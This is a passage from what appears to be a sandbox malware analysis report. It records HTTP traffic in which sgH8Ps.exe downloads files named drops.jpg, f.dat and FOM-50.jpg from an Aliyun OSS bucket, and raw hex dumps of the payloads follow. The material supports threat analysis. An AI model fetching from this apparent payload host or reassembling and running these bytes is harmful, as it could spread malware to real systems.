                                                  Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.649991118.178.60.94436196C:\Users\user\Documents\sgH8Ps.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:15:15 UTC114OUTGET /drops.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:15:15 UTC545INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:15:15 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 37274
                                                  Connection: close
                                                  x-oss-request-id: 67767543EE85213834733A46
                                                  Accept-Ranges: bytes
                                                  ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                                  Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 9193697774326766004
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                                  x-oss-server-time: 3
                                                  2025-01-02 11:15:15 UTC3551INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                                  Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                                  2025-01-02 11:15:15 UTC4096INData Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc
                                                  Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                                  2025-01-02 11:15:15 UTC4096INData Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5
                                                  Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                                  2025-01-02 11:15:15 UTC4096INData Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38
                                                  Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw98
                                                  2025-01-02 11:15:16 UTC4096INData Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56
                                                  Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAqV
                                                  2025-01-02 11:15:16 UTC4096INData Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb
                                                  Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                                  2025-01-02 11:15:16 UTC4096INData Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3
                                                  Data Ascii: ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                                  2025-01-02 11:15:16 UTC4096INData Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39
                                                  Data Ascii: t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
                                                  2025-01-02 11:15:16 UTC4096INData Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe
                                                  Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                                  2025-01-02 11:15:16 UTC955INData Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20
                                                  Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.649992118.178.60.94436196C:\Users\user\Documents\sgH8Ps.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:15:18 UTC110OUTGET /f.dat HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:15:19 UTC558INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:15:18 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 879
                                                  Connection: close
                                                  x-oss-request-id: 677675466FB42B353797339F
                                                  Accept-Ranges: bytes
                                                  ETag: "E54C4296F011EC91D935AA353C936E34"
                                                  Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 11142793972884948456
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000113
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                                  x-oss-server-time: 1
                                                  2025-01-02 11:15:19 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                                  Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.649993118.178.60.94436196C:\Users\user\Documents\sgH8Ps.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-02 11:15:20 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                                  User-Agent: GetData
                                                  Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                  Cache-Control: no-cache
                                                  2025-01-02 11:15:20 UTC546INHTTP/1.1 200 OK
                                                  Server: AliyunOSS
                                                  Date: Thu, 02 Jan 2025 11:15:20 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 55085
                                                  Connection: close
                                                  x-oss-request-id: 67767548A0BE37383714D662
                                                  Accept-Ranges: bytes
                                                  ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                                  Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                                  x-oss-object-type: Normal
                                                  x-oss-hash-crc64ecma: 12339968747348072397
                                                  x-oss-storage-class: Standard
                                                  x-oss-ec: 0048-00000105
                                                  Content-Disposition: attachment
                                                  x-oss-force-download: true
                                                  Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                                  x-oss-server-time: 3
                                                  2025-01-02 11:15:20 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                                  Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                                  2025-01-02 11:15:20 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                                  Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                                  2025-01-02 11:15:20 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                                  Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
                                                  2025-01-02 11:15:20 UTC4096INData Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4
                                                  Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn*{75|?flLOIVw)`]b* hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
                                                  2025-01-02 11:15:20 UTC4096INData Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1
                                                  Data Ascii: xryQGT*_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALr*i.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{|}{
                                                  2025-01-02 11:15:20 UTC4096INData Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47
                                                  Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6*:9FQ4( "pI$et)3q}Y/I*Z!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
